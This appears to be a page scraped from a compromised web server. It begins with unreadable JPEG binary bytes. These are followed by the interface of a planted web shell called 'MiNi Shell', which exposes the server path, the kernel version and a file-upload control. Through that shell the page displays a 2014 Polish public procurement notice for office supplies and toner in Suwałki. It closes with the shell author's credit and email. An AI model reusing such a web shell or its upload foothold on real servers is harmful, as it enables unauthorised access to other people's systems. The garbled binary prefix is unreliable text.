JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140225/65508-N-2014.html

<p class="kh_header"><b>Suwałki: Dostawa materiałów biurowych oraz tonerów na potrzeby realizacji projektu pt. Regionalny Ośrodek Europejskiego Funduszu Społecznego w Suwałkach</b><br>
<b>Numer ogłoszenia: 65508 - 2014; data zamieszczenia: 25.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Rozwoju Regionalnego ARES S.A. w Suwałkach , ul. Teofila Noniewicza 42A, 16-400 Suwałki, woj. podlaskie, tel. 87 5666106, faks 87 5667497.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ares.suwalki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych oraz tonerów na potrzeby realizacji projektu pt. Regionalny Ośrodek Europejskiego Funduszu Społecznego w Suwałkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa materiałów biurowych oraz tonerów na potrzeby realizacji projektu pt. Regionalny Ośrodek Europejskiego Funduszu Społecznego w Suwałkach:

Zadanie 1: Dostawa materiałów biurowych na potrzeby realizacji projektu pt. Regionalny Ośrodek Europejskiego Funduszu Społecznego w Suwałkach.

Zadanie 2: Dostawa materiałów biurowych, papieru ksero oraz tonerów do samodzielnego wykonania materiałów informacyjnych na potrzeby projektu pt. Regionalny Ośrodek Europejskiego Funduszu Społecznego w Suwałkach.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.21.13-6, 30.12.51.10-5, 30.19.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 7.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełnienia tego warunku na podstawie analizy oświadczenia o spełnieniu warunków udziału w postępowaniu złożonego przez wykonawcę.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełnienia tego warunku na podstawie analizy oświadczenia o spełnieniu warunków udziału w postępowaniu złożonego przez wykonawcę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełnienia tego warunku na podstawie analizy oświadczenia o spełnieniu warunków udziału w postępowaniu złożonego przez wykonawcę.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełnienia tego warunku na podstawie analizy oświadczenia o spełnieniu warunków udziału w postępowaniu złożonego przez wykonawcę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełnienia tego warunku na podstawie analizy oświadczenia o spełnieniu warunków udziału w postępowaniu złożonego przez wykonawcę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Stosownie do art. 144 ustawy, Zamawiający zastrzega sobie możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której wybrano Wykonawcę, polegającej na:
a)	zmianie osób wyznaczonych do uzgodnień i koordynacji przedmiotu niniejszej umowy,
b)	sprostowania oczywistych omyłek pisarskich i rachunkowych.
Ponadto  Zamawiający przewiduje możliwość zmiany umowy w przypadku:
- gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizacje przedmiotu umowy; 
- gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na sfinansowanie umowy;
- zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ares.suwalki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Rozwoju Regionalnego ARES S.A. w Suwałkach, ul. Noniewicza 42 A, 16-400 Suwałki, od poniedziałku do piątku, godziny urzędowania 7.00-15.00..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2014 godzina 08:00, miejsce: Agencja Rozwoju Regionalnego ARES S.A. w Suwałkach, ul. Noniewicza 42 A, 16-400 Suwałki, Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt pt. Regionalny Ośrodek Europejskiego Funduszu Społecznego w Suwałkach
- współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, wdrożony i realizowany w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1: Dostawa materiałów biurowych na potrzeby realizacji projektu pt. Regionalny Ośrodek Europejskiego Funduszu Społecznego w Suwałkach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wyszczególnienie:	
1.Zakładki indeksujące wąskie w pudełku umożliwiającym szybkie wyciąganie indeksu, rozmiar 12 x 43 mm. W opakowaniu znajdują się zakładki w 4 kolorach. (35 zakładek x 4 kolory) -10sztuk;
2.Koszulka plastikowa  na 2 płyty CD/DVD  wykonana z miękkiego plastiku. Wyposażona w europerforację pozwalającą na wpinanie do segregatora (opakowanie = 100 szt.) -3opakowania;
3.Karteczki samoprzylepne 76 x 76 mm. -10sztuk; 
4.Skoroszyt A4 kolorowy sztywny zawieszany wykonany z mocnego i sztywnego PCV, przednia okładka przezroczysta, tylna kolorowa, papierowy, wysuwany pasek opisowy, po przeciwnych stronach grzbietu 2 wycięcia ułatwiające wysuwanie paska, zaokrąglone rogi, boczna perforacja. -300sztuk;
5.Marker permanentny, wodoodporny, dwustronny, zakończony dwiema piszącymi końcówkami: igłową cienką min. 0,4  mm i okrągłą stożkową o grubości linii pisania 1,5 - 2,5 mm.  Marker przeznaczony do pisania po różnych powierzchniach drewno, tkanina, szkło, plastik, ceramika, a także do opisywania płyt CD/DVD. Atrament wodoodporny. - 30sztuk;
6.Papier biały o parametrach A4 80 +g/ m2,  białość CIE 161+2, wilgotność % 3,8-5,0, zaklejenie g/m2 25+, przepuszczalność powietrza cm3/min <1 250, gładkość cm3/min  180+ 50, grubość um 108+3, nieprzezroczystość % >90, jasność D65 (z UV) % 110+2     
(ryza = 500 szt.) - 81ryz;
7.Segregator A4/7cm dwu-ringowy mechanizm dźwigniowy, okucie metalowe na dolnych krawędziach, dwustronna wymienna etykieta na grzbiecie, na przedniej okładce dwa otwory rado ułatwiające zamykanie segregatora, wzmocniony otwór na palec ułatwiający wyjmowanie segregatora, oklejony z zewnątrz folią polipropylenową. -30sztuk;
8.Segregator  A4/5cm dwu-ringowy mechanizm dźwigniowy, okucie metalowe na dolnych krawędziach, dwustronna wymienna etykieta na grzbiecie, na przedniej okładce dwa otwory rado ułatwiające zamykanie segregatora, wzmocniony otwór na palec ułatwiający wyjmowanie segregatora, oklejony z zewnątrz folią polipropylenową. -30sztuk;
9.Klej w sztyfcie, bezbarwny i nietoksyczny. Posiadający bardzo dobre właściwości klejące,  niebrudzący i zmywalny. Posiadający atest PZH. Gramatura,15 g. -6sztuk;
10.Koszulki A4 krystaliczne z rozcięciem górnym, multiperforowane, wykonane z folii PP (opakowanie = 100 szt.) -20opakowań;
11.Spinacze biurowe 28 mm (opakowanie = 100 szt.) -20opakowań;
12.Zszywki biurowe 24/6  (opakowanie = 1000 szt.) -20opakowań;
13.Zszywki do małego zszywacza no.10 (opakowanie = 1000 szt.)	-20opakowań;
14.Taśma samoprzylepna przezroczysta 24mm x 30m. -20sztuk;
15.Nożyczki biurowe 15,5 cm	-3sztuki;
16.Folia kopiująca do telefaksu (70 m)do Panasonic KXFP363 -2sztuki;
17.Kartony archiwalne, pudła archiwalne na dokumenty 32 x 24 x 6,5 cm. -30sztuk;
18.Klipy biurowe 19 mm (opakowanie = 12 szt.)	-20opakowań;
19.Klipy biurowe 25 mm (opakowanie = 12 szt.)	-20opakowań..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2: Dostawa materiałów biurowych, papieru ksero oraz tonerów do samodzielnego wykonania materiałów informacyjnych na potrzeby projektu pt. Regionalny Ośrodek Europejskiego Funduszu Społecznego w Suwałkach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wyszczególnienie:
1.Papier biały o parametrach A4 80 +g/ m2,  białość CIE 161+2, wilgotność % 3,8-5,0, zaklejenie g/m2 25+, przepuszczalność powietrza cm3/min <1 250, gładkość cm3/min  180+ 50, grubość um 108+3, nieprzezroczystość % >90, jasność D65 (zUV) % 110+2 
(ryza = 500 szt.) -38ryz;
2.Toner do kserokopiarki Konica Minolta Bizhub 361 TN 551 Okres  gwarancji: co najmniej 24 miesiące od dnia odbioru toneru przez Zamawiającego, toner  równoważny opisanemu musi być kompatybilny z ww.  drukarką i spełniać wymagania dotyczące przedmiotu zamówienia ** -1sztuka;
3.Teczka kartonowa z gumką, trzy - skrzydłowa  z dwiema narożnymi gumkami w kolorze teczki. Wykonana z mocnego preszpanowego kartonu o gramaturze od 350 do 390g/m2,  format A4, (różne kolory) -50sztuk.

** Wymagania dotyczące przedmiotu zamówienia : 
1.Zamawiający wymaga dostawy materiałów eksploatacyjnych fabrycznie nowych, oryginalnych wyprodukowanych przez producenta sprzętu lub materiałów eksploatacyjnych równoważnych.
2.Przez materiał eksploatacyjny równoważny Zamawiający rozumie produkt:
a.fabrycznie nowy, nie regenerowany, pochodzący z bieżącej produkcji, wytworzony seryjnie w cyklu produkcyjnym, zgodnym z normą ISO 9001 lub normami równoważnymi, nie powodujący utraty gwarancji,
b.opakowany hermetycznie, nie noszący śladów użytkowania,
c.którego wydajność, zgodnie z normą ISO/IEC 19752 dla kaset z tonerem do drukarek monochromatycznych, ISO/IEC 19798 dla kaset z tonerem do kolorowych drukarek laserowych, 
oraz ISO/IEC 24711 dla wkładów drukujących, jest co najmniej taka jak materiału oryginalnego zalecanego przez producentów sprzętu,
d.który zapewnia jakość wydruku co najmniej taką, jak materiał oryginalny, zalecany przez producenta sprzętu,
e.który nie ogranicza pełnej współpracy z programem sprzętu, monitorującym stan zasobników 
z tuszem lub tonerem,
f.który w żadnym stopniu nie narusza praw patentowych ani innej własności intelektualnej, 
g.w którym wszystkie części są nowe, w szczególności bęben światłoczuły, listwa podająca, listwa zbierająca, wałek magnetyczny, 
h.w którym zastosowano toner / tusz dopasowany do pracy z danym urządzeniem. 
3.Wszystkie oferowane materiały winny być opatrzone znakiem firmowym producenta, etykietą zawierającą numer katalogowy, kod kreskowy, listę modeli sprzętu, do których jest przeznaczony oraz termin ważności. 
4.Zamawiający nie dopuszcza możliwości zaoferowania materiałów eksploatacyjnych napełnianych powtórnie lub skopiowanych w sposób naruszający prawo polskie lub UE.
5.Wszystkie materiały eksploatacyjne muszą posiadać:
a.dla poszczególnych tonerów dokumenty / testy wydajnościowe, z których w sposób nie budzący wątpliwości winno wynikać, że oferowany materiał posiada takie same lub lepsze parametry techniczne, wydajnościowe i jakościowe zgodnie z normami:  ISO/IEC 19752 - dla tonerów monochromatycznych ISO/IEC 24711 - dla wkładów atramentowych , ISO/IEC 19798 - dla tonerów kolorowych
b.certyfikaty / dokumenty potwierdzające, że proces produkcji zaproponowanego asortymentu przebiega zgodnie z normami ISO 9001: 2008. 
Powyższe dokumenty Wykonawca będzie zobowiązany dostarczyć wraz z dostawą materiałów do siedziby Zamawiającego.  
6.Jeżeli w trakcie trwania umowy Zamawiający stwierdzi, iż wydajność, jakość lub niezawodność dostarczonych produktów odbiega na niekorzyść od parametrów produktu oryginalnego (pochodzącego od producenta urządzenia, do którego materiał jest przeznaczony) lub jeżeli produkt  nie sygnalizuje we właściwy sposób stanu zużycia tuszu lub tonera, może zażądać od Wykonawcy zamiany materiału oferowanego na materiał nowy.
7.W przypadku trzeciej reklamacji danego typu materiału eksploatacyjnego Zamawiający może żądać dostaw materiałów oryginalnych.
Oferta równoważna:Wszystkie wskazane  materiały należy rozumieć jako określenie wymaganych parametrów technicznych 
lub standardów jakościowych. Zamawiający dopuszcza dostawę materiałów eksploatacyjnych równoważnych 
do drukarek co do jakości i zastosowanych rozwiązań technicznych i technologicznych opisywanych w niniejszej specyfikacji. Jeżeli Wykonawca składający ofertę zaoferuje rozwiązania równoważne, to na Wykonawcy spoczywa obowiązek (ciężar dowodu) wykazania równoważności poprzez złożenie w ofercie odpowiednich dokumentów potwierdzających tą równoważność..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.13-6, 30.12.51.10-5, 30.19.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com